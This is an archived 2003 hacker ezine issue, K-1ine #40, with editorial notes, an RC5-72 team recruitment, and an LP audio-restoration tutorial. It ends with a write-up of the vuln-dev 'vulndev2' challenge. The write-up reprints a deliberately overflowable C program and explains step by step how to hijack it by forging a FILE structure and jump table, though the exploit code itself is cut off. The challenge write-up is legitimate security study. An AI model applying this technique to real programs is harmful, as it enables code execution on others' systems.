💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › K1INE › k-1ine_… captured on 2021-12-04 at 18:04:22.
View Raw
More Information
-=-=-=-=-=-=-
.,;;;. .,ijffDDDDDLLji;.
tfDKKKKELj.;jGKKKKKKKKKKKKKKKDf;.
:EKKKEEKKWWWKKKKKKKKKKKKKKKKKKKKKKKEffji.
DKEEKKKWWWKKKEEKKKKKKEKDKKEKKKKKKEEEEKWWWL:
:KKEKKKWWKKEEKKKKDLfftfiLLtKKWWKKEGLDtGGKWKDL
,KKEKKKWWKKKKKKKEfGLDiGtjEGKK#WWKWKDKEEKEWWKG:
;KKKKKKWKKEKKKKKKKEEGEEDWKKWGiitiitKKKWKKWWWW
,KWKKKWWWKKKKKWKKKKKKKKKWKKWLi::,:,LKWWWWWWjD.
:KWKKKWWWWKKWWWKWKKKWKKKWWKWG,:::::jEWWWWWW::
.WWKKKKWWWWWWWWKWWKEWKWKWKEWK,:::::LEGDWWED
;WWKKKKWWWWWWWWWWEDfLDGDEEGLDG:::;ffjLG#f,
tWWKKKKKWWWWWWWWGfjiiLLLti:,:;::,DffjtKj
LWWKKKKKWWWLttjE#f.:;KWE..::::.:;WE:.ti
;W#KKWKKWWWfiii;KK,::;GL..::::::;j;::j
DWWKKWKWWW#EiiiEKG::.:::::::::::;:::f
;#WWWWKWWWWW iGLKWi.:::::::,,,,:::;fK
LEEKWWWWWfD, .GKWf:::::::::::::,fKWK:
'ifGWWWWW,j; ;KKf::::::::::::iLWEKKi .
;LWWWG : jKKf::::;ii,:::' WKKWE .,,,;.
f##j GKKf::::::f, WKKWKj .,:. :,:::
iLj ,KKKG,:::::L,. WKKWW:; ,,:,:... .;,.
..,iitWWKD,:::::ttjii;;i#WKKW .,:,,. ....,:,ii;,
,;;;;;;,;;WWWEt:::.:i;;;;t;tDWKLK .::...:,,:ii;j;:;tt
,;;:::::::;,,fWWWK,,,:,;ii;;,;LDWGttt ':,;;;,;;,,,;jiij'
i:::::::::::,:;fEEWE,:,::::::::,Wfi,::i .,;i:,t;,,;,'
i:::::::::::::;;;tLGDEt::::::::.jG;;;,:t t;,i;;t.
t:::::::::::::::i;;::::ii::::::::;:::iiij. t:,;i,::
i;:::::::::::::::,;;i;::::::,::,,,:::::,;ii: ,,:::,i,,i.
;i:::::::::,:::::::;:;;:,,,,,::,,;,,,,,:::::;i; i:i;,::::;;
.i:::::::::,;:::::::,:,;:::::::::,;;;i::::::::::,. ,::::::::t
:i:::::::::,ijt;;,,:::,:,::::::::::::,;:::::::::::,;. .;i::::::i
;;:::::::::,;. ;;,,::::,:,:::::::::::::::::::::::::::t i:::::,,
;::::::::::;, ;t:::::i;i::::::::::::::,,;;;,,:::::,j :;::::t
;::::::::::,, .i:::,;tti,::::::::::,,;;;;;i;;,,,;i; :,:::::'
,:::::::::,i' i,:ii;;iii;;;,,,;;;;;;;;;;;;;;;;;t .;:::::::;
,:::::::::i, it;i;;;;;;;;;;;;;;;;;i;;;;;;;;i; .;::::::,;,
,::::::::;; ji;;;;;;;;;;;;i;;;;;;;,,,;;t; ,,::::::::;,
;:::::,,;j, ;;;;;;;;;;;;,;;;;;;;;;;,;j: ,,;:::::::;,.
i:::::,;,;;;, ;jii;,,,,,;;;;;;;;,,:,,;,f,,::::::::;,
';:::::::::::, :;,:,,;;;;,,;;,,::,,;;,,i,::::::::;,
',,.::::::::::, ii;;;,,;;,,,:::,;;;;;;,t;:::::::;.
:,,:::::::::::, t;::,;;,::,,::,;;;;;;,;ti::::,,:
`:,,:::::::::::, t:,;i;::,;;,,;;;;;;;,,;;tj:::;'
',;::::::::::. t;;;,,,;;;,;;;;;;,;;,,;,,j,;'
',;,:::::::;,.tf;:,;;i;:,,;;;;,,;;;;;,;;f
',,:::::::,fKGfjtti::,,;;,:,;;;;;,;;ij
'':::::::,KDGDDDGLfffjjffffLGGGKEKj
',:::::GKEEEDDDDDEDEKKKDLKKKKWWK;
i,::,DDGDEEKKKKKKKKKKKKKEEEWWKK,
:, :,:::iKEDDDDDDEEKEEEDKKKKEEKKKKWf,
;,;i:.,:::,EEDDDDDDGGGGGDDKKKKKKKKKKKKWW;
i,tii;::::LEGGGDDDDDDDEEEKKKKKKEDDDEKKKKK.
.,j;,i::::jEGGGGGDDEEEDGDDKKKKWKEEKKKKKKKKKt
.;iti;::.iKGGGGGGGGGGGDDDDDKKKWKKKKKKKKKKEKW,
;ii;:;LKDGGGDDEEEKKKKKKKKKKKWKKKKKKDDGGEKKKi
;ZEGGGGGGGGDGGGGGGDEKKKKKKWKKKKKEDEEKKKKKE,
i;LDDDGGGGGDDDEKKKKEKKKKKKKKKKEKKKDLftii,:;t
t;:;iijLDDDGGGGDEKKKKKKKWWKKKKGfti':::,:;it;,
:jt;;;;;,;itfffGDKKKKKKKKEGif:;:;;;,;;;:,:i:t
.i::::::;,i;;;;;:;,iiijLGjii;;,;:::::::::::;i,
t;::::::::::;::;;iittjftt;;:::::::::::::::::t.
`;:::::::::::::::::::;jj;;:,::::::::::::::::;:
:i::::::::::::::::::,;Gj;;:::::::::::::::::.t.
i:::::::::::::::::::,f:i;:::::::::::::::::::t
t::::::::::::::::::,t.i,:::::::::::::::::::;:
.:::::::::::::::::::,; i::::::::::::::::::::;
.:::::::::::::::::::t .,:::::::::::::::::::;:
i::::::::::::::::::i .;.::::::::::::::::::t
:;:::::::::::::::::;. ',::::::::::::::::::;,
j::::::::::::::::::; :,::::::::::::::::::;
:t:::::::::::::::::t :,:::::::::::::::::t
,GDDDDt t,:::::::::::::::.t ::::::::::::::::::;.
:K####E .................; :::::::::::::::::;,
t####G jDKDt .... ..... ::::::::::::.
E####, K#####K. . .jD; ;:::::::::. "Lj,
i####G W#######f jW##: ,GKKG: :.......... X##E>
d##Kf: .####W. G##KEW##" ;E###f ,##@##E ........ ,f""`
K##W##L E####; jf" :G####Wf `W##E" .. .
'K##W##.L####;jKj .tD#1"###t . tWED . ,;tkEW#W#WEki,
"f##ff###W,f###f `""' j##D W#E#j ;ijfG##WKGfKWk, 7W####W#EKGft
t###E.`L####f ,jxxk;, K#W. ,#W#f ,j#K###F" `7##W; ##K
f###L "K####j `WXXEKf t##k f##W. ;##D" .KW#K ;d###E##L
L###t :W####t ;###i ,###; j##t' GW#Wt .fGW###WEf:
.E##K: "#####t L##Wf K##G :##P :G##Wf 7##k
;W##G ;#####i j####i j###: t#y" ,G##W' ,ai####E##K#KDLt.
.G###i ;#####j :GK#WfkTL.fWEDK .xyP" .yj#L" ;tfkK#WE#KEWEWGEXi
iW##D: "W####D;:, `40`
cYb' :E######Ef;.
`L#########K;,
FIREP0WERMASTER "D##########Wt 0UR K0DE-FU IS BETTER THAN Y0URS
"ifDKW####Ky
`'""""""'
:###:
,G############f; #####,
E##############; .iLEDDDDW####KDDDDGGGLt
K###t :jK####################;
D###j `""""""D####j""""t####,
G###i G####i ;####;
D#############; ;G#########################t
G#############; tW#########################L
L###G K####; ;####i
D###E ,;GEEE###############:
K###f :jK####################;
E#############: E###Ei
L#############; L###f:
K###G :tK########W#############L,
;####f, iL#######################E;
,f####################### f"""""""""D###Gj""""""""`
ij########################; f###j: ,,,
`""""""""""j###W"""""""""' f###j: ;W#E:.
.,t###f" ,;; :jjttttjttE###DLtjttfK###Dji,
.iG###f" ,W##f, :j##########################Kj
,ij#################itfGGDDDDDGGW###WEGDDDDGLLLGDL"
:jE###################E. f###f,
`"""""""""""""""";K###L L###L,
f###f L###L;
`"""' D###G;
'###i'
,i:
,f###i.
7########################################i
"#################W#############P" ";`
,i: E### ;#k.
j#####################W###########################i
:##################################################f,
;###;' E### ,###Kf"`
f###Y; d##########j K### d###############P"
.G###Y' .;############; E### :#############P"
`Y#t: K###
.i###########f;. .i###j .d###########f:
`##########P' ,f###j;. "#########P"
;L#######j,
.f###K" :####Li.
,f###K;, "L####Li:.
;f###f:"###j, `tj####Lfk;..
,f###Ef` 'i###k. `fEK##############Gj,
.,dL###Gi" `D###L `itf############t"
,:t####jt" .####k. ,ij;. `tY###Y"
,,d####";##############################j:, ";"
.;k#P" "##############################t;
;#####i"
.i####i"
.;###;,. .L####;`
`7#########:.
":########k;,
`"Yi#####L
`i####f
`:L"
__ __ __ __ __ __ __ __ _____ _____ _____ _____
__ __ __ __ _____ _____ __ __ __ __ _____ _____
__ __ _____ __ __ _____ __ __ _____ __ __ _____
... S u m m e r 2 0 0 3 ...
_________________________________________________________________________________
� .- Words from the Editor -. � |
*: [-] Introduction ............................................ The Clone :*
*: (-) Contact Information ..................................... The Clone :*
*: (-) Nettwerked.net: K-1ine magazine goes quarterly .......... The Clone :*
*: (-) K-1ine Feedback ......................................... Voyager :*
*: (-) Link of the Month ....................................... The Clone :*
*: (-) K-1ine Mirrors .......................................... The Clone :*
*: (-) RC5-72 Challenge - Join the Bawks.net Team! ............. Bawks.net :*
________________________________________________________________________________
� .- Documents -. � |
- : (x) 'Phat audio restoration methods' ......................... CyberSk4nk :*
- : (x) 'Details on Exploiting the vulndev2 Challenge' ........... Fractal :*
- : (x) 'Waste' .................................................. son4r :*
- : (x) 'Waste Network Advisory' ................................. jdm :*
- : (x) 'Hack lynksys routeur pppoe' ............................. Dunter :*
- : (x) 'A simple (noisy!) TCP scanner'........................... Seuss :*
- : (x) 'Identity New' ........................................... Unknown :*
- : (x) 'The Ice Hooter: One hit shit!' .......................... Phlux :*
_________________________________________________________________________________
� .- Conclusion -. � |
*: [-] Credits ................................................. The Clone :*
*: [-] Shouts .................................................. The Clone :*
_________________________________________________________________________________
Introduction:
Welcome to the latest issue of K-1ine #40 'Our Kode-Fu is better than yours'. I would
like to thank everyone who submitted articles to me - you sent me so many! Enjoy this
issue of K-1ine zine, it should be a fairly good read as it is celebrating its fortieth.
A huge thanks to Cyb0rg/asm of Hack Canada (www.hackcanada.com) for the kick-ass ascii
for this issue. You did an excellent job (as usual), and for that The Clone thanks you.
-`
-->
Contact Information;
Comments/Questions/Submissions: theclone@hackcanada.com
Check out my site: (Nettwerked) http://www.nettwerked.net
-
-----------------------------------------------------------------------
Nettwerked.net: K-1ine magazine goes quarterly
[ For Immediate Release ]
Monday, June 16, 2003:
-
Edmonton, Alberta -- In a decision that is sure to make headlines; Nettwerked.net
has announced that 'K-1ine', Canada's longest running hacker, phreak, electronics,
and political magazine has been turned into one that will now be published quarterly.
In its beginning, K-1ine initially started out as a magazine that was released whenever
its only editor and major writer, The Clone, had the time to piece the beautiful ascii-
art filled digital pages with everything that an underground publication should have.
However, after approximately one year, K-1ine quickly grew into a magazine that had
many contributing writers and artists, so The Clone decided that keeping K-1ine as
a release that came out rarely certainly was not going to cut it for his readers.
He wanted to have something that all HackCanada.com / Nettwerked.net visitors could
look forward to once a month. So in July of 2000, K-1ine turned into a monthly release,
and stayed that way until three years later in the summer of two-thousand and three.
Starting this summer, K-1ine #40 will follow the newly implemented quarterly format,
and will contain all the great articles and stories that you've grown to love from
the magazine that changed the face of the Canadian hacking / phreaking scene forever.
Make History:
From now until mid summer, you have the opportunity to make history by having your
unique and intelligent writings in the groundbreaking new issue and format of K-1ine
that is sure to yank the sexzi panties off your hot of-legal-age female counterparts.
Upcoming Issues:
* Summer 2003: K-1ine 40
* Fall 2003: K-1ine 41
* Winter 2003-2004: K-1ine 42
* Spring 2004: K-1ine 43
Prepare for better quality releases with much more content!
--
K-1ine Feedback
(Regarding the link of the month for K-1ine 39)
From: "Will Spencer" <will.spencer [at] nsai.net>
To: <theclone@hackcanada.com>
Subject: Thanks
Date: Mon, 16 Jun 2003 23:26:52 -0600
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2616
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Importance: Normal
Thanks for linking my site in your 'zine. :-)
Have you seen my most popular site, http://www.hackfaq.org ?
Will / Voyager
--
--=[ LINK OF THE MONTH ]=--
Every month I post one really great "link of the month" on every issue
of K-1ine magazine. The link can be anything in the technology industry,
music scene, rave scene, punk scene, or even a good article you read on
a news site. I'll be taking submissions via e-mail or IRC right away; so
get your links in and maybe you'll see it in the next issue of K-1ine!
For the month of June, the link of the month is:
http://www.teamabuse.com/toxic/stuff/swk.htm
""
The Fat StarWars Kid. If you haven't seen this yet, you should! :)
[submitted by: Kybo_Ren]
--
K-1ine Mirrors:
http://www.mirrors.wiretapped.net/security/info/textfiles/k1ine/
(Now mirrored in two places, one in Belgium and another in Sydney)
"Wiretapped.net is an archive of open source software, informational
textfiles and radio/conference broadcasts covering the areas of network
and information security, network operations, host integrity, cryptography
and privacy, among others. We believe we are now the largest archive of
this type of software & information, hosting in excess of 20 gigabytes of
information mirrored from around the world."
--
http://www.hackcanada.com/canadian/zines/index.html#K-1ine
Hack Canada - Canadian H/P - E-Zines
--
http://www.stealthiscomputer.org/k-1ine.html
Steal This Computer - K-1ine Archive
--
http://www.to2600.org
Toronto 2600 - K-1ine Archive
--
RC5-72 Challenge - Join the Bawks.net Team!
Strength in numbers...
About:
That's right, some of the members and affiliates of Nettwerked.net,
StealThisComputer.org, Toronto2600.org, and PacketNinja.ca are teaming
up to help the international hacker and information security community
in breaking the latest RC5-72 bit encryption scheme. Our organization,
Team Bawks.net, is comprised of some of the most active and well-known
people in the Canadian hacking / phreaking scene. Come Join Team Bawks.net
and help us win!
Why?
Because there's a total cash prize of $10,000 (US) - $1000 for the machine
that successfully cracks it, and $1000 for the entire team. The other $6000
goes to a non-profit organization chosen by all participants, and $2000 to
distributed.net for building the network and supplying the code. So if you
join our team you won't only be able to bask in the glory of being part of
the encryption cracking group who owned the planet, but you will also get
your fair share of big cash which will be evenly distributed to the group
participants.
How?
So if you think you have what it takes to help us win this contest, then
please visit this link. Your computing power and full dedication is what
Bawks.net needs and wants! We know you have what it takes. BE ALL THAT YOU
CAN BE(TM) (without having to join the silly US Army). For detailed informa-
tion on the RC5-72 Challenge, and to download the official client (available
for over 20 different types of operating systems) then be sure and visit:
www.distributed.net.
Registering with our team (update by cyberSk4nk): Registering is easy, once
you have submitted at least one work unit. stats.distributed.net contains
stats for each member and it is updated at 23:59 UTC (a.k.a. GMT, London time).
In order to register for Team Bawks.net, submit at least one work unit by the
update time, and then search for your e-mail address using the search box on
the rc5-72 project page. At the bottom, there is a link that says "Please e-
mail Me My Password". Click on that to get your password, and then login to
stats.distributed.net and change it. While you're at it, fix your user pref-
erences. Then, after this is done, search for "bawks" in the team search box,
and oogle over our wicked stat results! When you are finished being mesmerized
by our supercomputing like skillz, click on "I want to join this team" link at
the bottom of the team stats. If all works well, it should tell you that you
have joined! If it dosen't work, don't panic. First, make sure you did in fact
log in with your distributed.net user id and password. If you enter that info
incorrectly, you might have to clear your cookies and delete all your stored
passwords from your browser. I know The Clone had some nasty problems with that,
as did I. Try again, and hopefully it should be peachy. Good Luck! --cyberSk4nk
Tips:
After you have registered for our team and downloaded the client, you'll need
to configure your account.
distributed.net client configuration:
-------------------------------------
1) General Client Options
2) Buffer and Buffer Update Options
3) Performance related options
4) Logging Options
9) Discard settings and exit
0) Save settings and exit
Choice --> 1
distributed.net client configuration: General Client Options
------------------------------------------------------------
1) Your email address (distributed.net ID) ==>
2) Complete this many packets, then exit ==> 0 (no limit)
3) Run for this long, then exit ==> 0:00 (no limit)
4) Pause flagfile Path/Name ==>
5) Exit flagfile Path/Name ==> exitrc5.now
6) Enable restart on .ini file change? ==> no
7) "Pause if running" ==>
8) Pause if running on battery power? ==> yes
9) Run detached/disable all screen output? (quiet mode) ==> no
10) Crunch-o-meter (progress indicator) style ==> -1 (auto-sense)
0) Return to main menu Choice --> 1
(Make sure you enter in the e-mail address you used when joining Team Bawks.net)
distributed.net client configuration: General Client Options
------------------------------------------------------------
Your email address (distributed.net ID):
Completed work sent back to distributed.net are tagged with the email
address of the person whose machine completed that work. That address
is used as a unique 'account' identifier in three ways: (a) this is
how distributed.net will contact the owner of the machine that submits
the winning key; (b) The owner of that address receives credit for
completed work which may then be transferred to a team account; (c)
The number of work-units completed may be used as votes in the selection
of a recipient of the prize-money reserved for a non-profit organization.
Default Setting:
Current Setting:
New Setting -->
distributed.net client configuration:
-------------------------------------
1) General Client Options
2) Buffer and Buffer Update Options
3) Performance related options
4) Logging Options
9) Discard settings and exit
0) Save settings and exit
Choice --> 2
distributed.net client configuration: Buffer and Buffer Update Options:
-----------------------------------------------------------------------
1) Buffer in memory only? (no disk I/O) ==> no
2) In-Buffer Filename Prefix ==> buff-in
3) Out-Buffer Filename Prefix ==> buff-out
4) Checkpoint Filename ==>
5) Disable buffer updates from/to a keyserver ==> no
6) Keyserver<->client connectivity options
7) Disable buffer updates from/to remote buffers ==> no
8) Remote buffer directory ==>
9) Load-work precedence ==> RC5-72,OGR=0
10) Additional buffer-level checking ==> 0 (none)
11) Buffer-level check interval ==> 0:00 (on buffer change)
12) Fetch work threshold ==> OGR=0,RC5-72=0
13) Fetch time threshold (in hours) ==> RC5-72=0
0) Return to main menu
Choice --> 9
distributed.net client configuration: Buffer and Buffer Update Options
----------------------------------------------------------------------
Load-work precedence:
The order specified here determines the order the client will look for
work each time it needs to load a packet from a buffer. For example,
"OGR,RC5,..." instructs the client to first look for work for OGR and
if it doesn't find any, to try RC5 next, and so on. You can turn off a
project by setting ":0" or "=0" after the project's name - for instance,
"XYZ:0" tells your client not to work on, or request work for, the XYZ
project. It is possible to have the client rotate through this list,
updating its buffers only once for each pass. To do so, 'Dialup-link
detection' and 'Additional buffer-level checking' must be disabled since
a buffer update (new work being made available) would otherwise cause the
client to go back to the beginning of the load order.
Default Setting: OGR,RC5-72
Current Setting: RC5-72,OGR=0
New Setting --> RC5-72,OGR=0
- Team Bawks.net
-
<coercion> i need some keekleberries for my wafflcakes so i can lollerskate in my
kekekemobile
-
------------------------Phat audio restoration methods--------------------------
by CyberSk4nk
================================================================================
You might think that a hacker or a phreaker has no need to restore audio when
there is such a good selection of tunes out there. Despite being lame ass
movies, I personally love to crank the "Hackers" or "Swordfish" soundtracks
when I'm cruising the net, shooting my mouth off on #hackcanada or getting the
latest DivX releases using Bittorent. However, I'm also a huge classic rock
fan, and can't live without the likes of Led Zeeplin, Def Leppard, ZZ Top or
Chicago blaring through my nice crisp Soundblaster Live card. I have a fair
number of nice classic rock CD's, but when you can find an almost never played
copy of The Cars' Debut LP at a record sale for 0.50$, how can you pass that
up? (I bought this at Victor Post's Garage sale that was put on after he died.
This garage sale was an electronics goldmine, since he collected some of the
coolest stuff around while he was alive. Too bad he didn't like the Cars!
For those that didn't know him, Vic was the Royal Photographer for Alberta and
responsible for photographing dignitaries when they visited our beloved Alberta.
He was a ham radio operator who was best friends with the late King of Jordan,
one of the first guys to experiment with holography, and IMHO one of the best
artistic photographer's in Canada. He was a great friend, and taught me
some great electronics skillz before he passed away from complications with
Diabetes. He was also almost completely blind. RIP VIC.)
Such a situation occured last summer, and I though, "Hey, this would sound phat
if I could get it on CD and crank it in my nice pimped up ride!" Since then I
have been restoring tons of old classics from my Dad and Uncle's record
collections that are too good to pass up such as ZZ Top's 1977 "The Best of"
album. In this article written exclusively for K-1ine #40, I will instruct
all you newbies on audio restoration exactly how to get a near-CD quality
restored copy of your favorite LP.
First, some sys reqs:
---------------------
At least a Pentium II PC with MMX
At least 128 MB ram
A CD burner. Any will do. Also, you need plenty of blank CD's.
2-4 gigs disspace free. Preferably on an ATA/100 drive or better
A decent soundcard. Any will work, but I recommend a Soundblaster Live! that
natively supports 32 bit audio for greater quality
Cooledit Pro 2.0 (Note, there is a *nix program called gramofile that works
great for this purpose too, but it will unfortunately
not be covered in this article. Sorry guys.)
Note: This procedure will work with tapes as well, although for some reason
they don't sound as good at all, since they have less of a dynamic range than
LP's. Yes, that's right. Tapes have very a very poor frequency range. However,
they don't have clicks and pop's like records do, so don't declick or depop
tapes. It's not necessary.
Here are the basic steps in restoring an LP:
1. Record side 1 and side 2 using Cooledit to disk, as two continuous files
(perferably at a higher bit depth than 16 bits, so that you can edit the file
at a high quality and resample later. This makes a *big* difference to the
final resulting restored audio)
2. De-click/De-pop the resulting audio
3. Remove the hiss from the audio
4. Divide the restored audio into tracks using cut-and-paste
5. Batch convert the resulting audio to 16-bit, 44100 KHz CD-quality audio
(note: only need to do this if you did step 1 with a higher bit depth)
6. Burn the resulting tracks to CD using Nero Burning Rom (recommended) or
your other favorite CD-audio burning software (like cdrecord/EasyCD Creator)
7. Rip the burn audio CD to MP3/OGG/ACC/FLAC audio for use on your computer
(optional)
Ok, so I imagine that gave most people and idea of how this will work. Here
are the above 7 steps in more detail:
Step 1: Recording the audio
---------------------------
In CoolEdit, open up the File menu and click new. If you're soundcard supports
it, click the radio button beside "32-bit (float)" and increase the sample rate
to a value higher than 44100 KHz. 64000 or 96000 should be great if your card
will record at that depth. At this stage, the higher the recording quality
will make the restoration process slower, but will increase your overall
output audio quality by eliminating minor imperfections in the de-clicking
and de-hissing algorithms. Then, make sure you're sound card's mixer settings
for recording are set to line in. To record, you'll need a record player, a
stereo amplifier, and most likely an RCA jack to 3.5 mm stereo phono adapter.
You can get this cable at your local radio shack, future shop or bestbuy where
they sell stereo accessories (note: i am not soliciting, this is just examples
of stores that might be in your area that might carry audio gear).
So, hook this RCA phono cord to your line in of your sound card, and hit the
record button to record both sides of the record onto your pc. When recording
is done for each side, save each file as a windows *.wav file by using "file->
save as...". Now you are ready to proceed with restoring your favorite tracks.
Step 2: Cleaning up the noise
-----------------------------
CoolEdit makes it pretty easy to filter out clicks, pops and hiss in records.
To remove clicks and pops, open the "Effects->Noise reduction" menu and
click on "Click/Pop Eliminator". You will be presented with all sorts of
technical options, and if you are in any doubt of how each one effects the
final result, use the hand help button in the bottom right corner. For almost
all recordings that are in good shape, click on the "Auto Find All Levels"
button and wait for it to do some crazy noise-reducing magic. Make sure
the option "smooth light crackle" is checked and "multiple passes" is checked
and set to a value of around 8. I found 8 to give me the best results for
high quality work. Then, make sure the "Run Size" is set to 25 samples for
high quality work as well (I stole this trick from the help menu, btw.)
Then click OK and wait for your computer to remove the clicks and pops from
your recording. Works pretty good, hey? By the way, if you only want to edit
certain parts of the recording, you can use the mouse to click and drag a
selection region for editing. Note that unselected audio will not be filtered
or processed, so always make sure you select *something*. Typically, I always
select the entire audio range.
Step 3: Reducing Hiss
---------------------
Reducing his is really easy. Basically, you first have to select a portion of
the recording that contains only hiss, and no music. The best bet is to select
the portion of hiss before each song, and reduce the hiss for each track
seperately by only processing each song at a time. This improves quality
because the amount of hiss can change throughout the recording.
To remove hiss, CoolEdit basically subtracts the hiss from the entire recording
by a specific volume level set in decibels (dB). Reducing too much hiss results
in a "tinny" sounding final result, so generally, you only want to reduce the
hiss a little bit, say between 9-20 dB at most, which gives you a nice sounding
result.
Select a blank portion of the audio that only contains hiss and use
"Effects -> Noise Reduction -> Hiss reduction..." and click on the "get noise
floor" button to get a statistical profile of the noise. Then, click the
ok button to reduce the hiss in that portion you selected. Replay that
selectio to see how much hiss can be reduced. Sounds like the Sound of Silence?
If it does, click "edit -> undo", select an entire song to de-hiss, and then
open up "Effects -> Noise Reduction -> Hiss reduction..." and click on "OK"
- without* changing any of the noise profile options, points, or control buttons.
There. You Know have a perfectly restored copy of your favorite record.
Step 4: Cut the Tracks
----------------------
Now It's time to divide up your tracks. On most records, this is dead
simple because there is a gap between each track. On records where all the
songs fade into each other, like the Abbey Road album or some live recordings,
use your best judgement or check the LP jacket for track times. Use the
"Edit -> cut" command, create a new sound track the same bit depth as your
original recordig, and use "Edit -> paste" to paste the track data into
the new file. Save the new file with a usefull name with a two digit number
at the beggining so you know which order the tracks are arranged in. This is
important when you want to burn them to cd, as it makes that process easier.
Step 5: Downconverting your Tracks
----------------------------------
If you recorded at a higher bitdepth than cd quality (CD quality is
16 bits, 44100 Hz audio) you need to down convert your audio. The batch convert
feature of CoolEdit is really usefull for this. Click "File -> Batch Convert"
to get the batch converting dialog box. Then, add your track files using
the "Add Files" button. Click on the "2. Resample" tab, and then click on
"Change Destination Format". Choose 44100 for your sample rate, and 16 bits for
your resolution. Click on "enable dithering" and type 1 in the "dither depth"
box. Under p.d.f, select "Triangular" or read the help for the pro's/con's of
the other options. Also select "No Noise Shaping" from the drop down box. Click
"OK". Under new format, choose "Windows PCM (*.wav)" and under the
"4. Destination" tab change the output filename template to *_16.wav. This
will append 16 to the end of each file so you know they are the down-converted
files for burning to cd. Finally, click on "Run Batch" and go get a hot cup of
java while your files are converted.
Step 6: Burning your tracks to Audio CD
---------------------------------------
I really shouldn't have to tell you guys how to do this. It's really simple.
Just open nero, create an Audio CD from the wizard, add your tracks with the
appened "16" from Step 5, and burn to CD. You might want to change the track
gap by using Disk At Once (DAO) burning and setting the trap gap to 0 seconds.
That's up to you though, and also it's up to cut your tracks. If you left
extra silence on the end of each audio file, you will definitely half to set
the track gap length to zero seconds to preserve the orignal time format of
the LP.
Step 7: Ripping the CD to MP3/OGG/ACC/FLAC
------------------------------------------
I won't cover this, since you guys I'm sure have done this many times before.
I might suggest using MusicMatch Jukebox which makes this painless, or
GRIP on linux which is also a wicked tool. Note that it is important
you do this step last, since the MP3/OGG/ACC formats are lossy audio codecs,
and if you convert your restored audio to these formats and then burn them,
your audio CD will loose quality. This is also a nice way of testing whether
your freshly minted CD works too.
A Note from cyberSk4nk:
-----------------------
Like many of you, I hate the RIAA, the MPAA and other conglomerates operated
by people motivated solely by greed. In this case, you should never half to
deal with these evil entities since it is your right by law to make a "fair
use" copy of all LPs you own. Of course, if you start taking Boby Dylan's
classic LP "Bringin' It all On Home" and distributing it to hundreds or
thousands of people, I would like to inform you that *it is not my fault* if
you get shit-kicked by corporate boot-fuckers like those from the RIAA.
You have been warned.
Thanks for reading this wicked 'zine. Shouts go out to wizbone, dec0de,
msViolet, nach0 and _mr-t and all other regulars in #hackcanada on
irc.stealtc.org:6667. Cheers guys, and have a great weekend! I am now heading
for the fridge for my favorite brew. Enjoy the tunes!
-cyberSk4nk-
-Sat Jun 14 18:14:51 MDT 2003-
-
<Bob_Dole> I think I have SARS.
<Bob_Dole> I'm going to go to school tomorrow and give it to everyone.
Bob_Dole was kicked off #hackcanada by wildman (No SARS)
-
--
Details on Exploiting the vulndev2 Challenge
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
On the vuln-dev mailing list there was a posting that posed a
challenge to exploit a certain code fragment. There were a number
of ways to exploit this code. Here is a copy of the code:
/* vulndev2.c */
#include <stdio.h>
#include <stdlib.h>
#define BFSIZE 90
int
main(int argc, char *argv[]) {
char *bfp;
char buf[BFSIZE];
FILE *f1;
if (argc != 3)
return 1;
if ( (bfp = malloc(BFSIZE)) == NULL)
return 1;
/* log input */
if ( (f1 = fopen("db.log", "a+")) == NULL)
return 1;
fprintf(f1, ";;%s;;", argv[2]);
fclose(f1);
strcpy(buf, argv[1]);
/* read log */
if ( (f1 = fopen("db.log", "r")) == NULL)
return 1;
if (fgets(bfp, BFSIZE, f1) == NULL)
return 1;
printf("%s\n", bfp);
fclose(f1);
exit(0);
}
There are essentially two straight forward ways to exploit this code:
Both of which are more complicated than simply overflowing the ret pointer.
(see below for why we can't do this).
The most obvious way is to overwrite printf's GOT tables, but the way I did
it was by overwriting the FILE * and pointing it to our own specially crafted
FILE structure somewhere in memory. From there, when glibc tries to fclose() f1,
it uses the function pointer _IO_file_jumps in the FILE structure to jump to a
jump table (which we've also placed in memory), which jumps to our shell code.
The exploit code is attached to the end of this message.
A step by step explanation of the exploit:
> /* log input */
> if ( (f1 = fopen("db.log", "a+")) == NULL)
> return 1;
> fprintf(f1, ";;%s;;", argv[2]);
> fclose(f1);
We put the memory location of where our specially crafted FILE struct will be into
the log file from arg2.
> strcpy(buf, argv[1]);
This call does most of the work. 4 things of note are put into memory because of it:
- A new value for bfp pointing 2 bytes before the f1 variable.
- A specially crafted FILE struct
- A jump table
- Our shellcode
> /* read log */
> if ( (f1 = fopen("db.log", "r")) == NULL)
> return 1;
> if (fgets(bfp, BFSIZE, f1) == NULL)
> return 1;
Here the program reads in data from the log file. When fgets() writes the data to bfp,
it actually overwrites the f1 variable because we changed where f1 is pointing in the
previous step. (We point bfp to 2 bytes before f1 because the logfile entry will start
with 2 semicolons)
> fclose(f1);
The system tries to fclose() f1 which is now pointing to our FILE struct. It follows the
_IO_file_jumps, selects one of our entries in our jump table and jumps to it. Remember all
of our entries in our jump table point to our shellcode.
Some notes:
- We could also have pointed bfp to the actual location in memory of where the FILE struct
for fp was closing and overwrote that, just leaving f1 pointing to where it originally
pointed. Both would have worked.
- At first glance I thought this exploit was going to be trivial. I thought we could simply
smash the stack on the strcpy() call and overwrite main's ret. However, this function only
returns in a few instances: not in the default case. Usually it exits using exit() which,
of course, ignores any ret calls. A race condition might exist to exploit this however.
Consider this:
The application opens up the log file for writing and writes its stuff. The application strcpy()s
your arg1 into buf. You overwrite main()'s return code to point at some shellcode. Now, if you're
extrememly quick, make the file non-readble in some way (deleting it, changing perms, etc): fopen()
will return NULL, and main() will return. 0wn3d:
> if ( (f1 = fopen("db.log", "r")) == NULL)
> return 1;
It would probably be easiest to exploit this on a lagged system accessing its filesystems over a
high latency means like, say, NFS.
- A number of people also suggested a symlink attack.
Conclusion:
This challenge was good in that it maked us realize just how many ways there are to exploit buggy
code. A good rule of thumb is this: If a program allows an attacker access to write to an arbitrary
location in memory, the code is almost certainly exploitable. In this sample of code even if the
program didn't call printf() or fclose() after the overflow, it still might be possible to exploit
this program by putting shellcode in the DTORS.
Note:
This article is a slightly updated and expanded copy of a message I posted to vuln-dev a while ago.
Shouts:
madness for forwarding me the vuln-dev message
theclone, rt, magma
syke
GOBBLES for reminding us how painfully necessary coherency is...
Fractal
The exploit:
/*
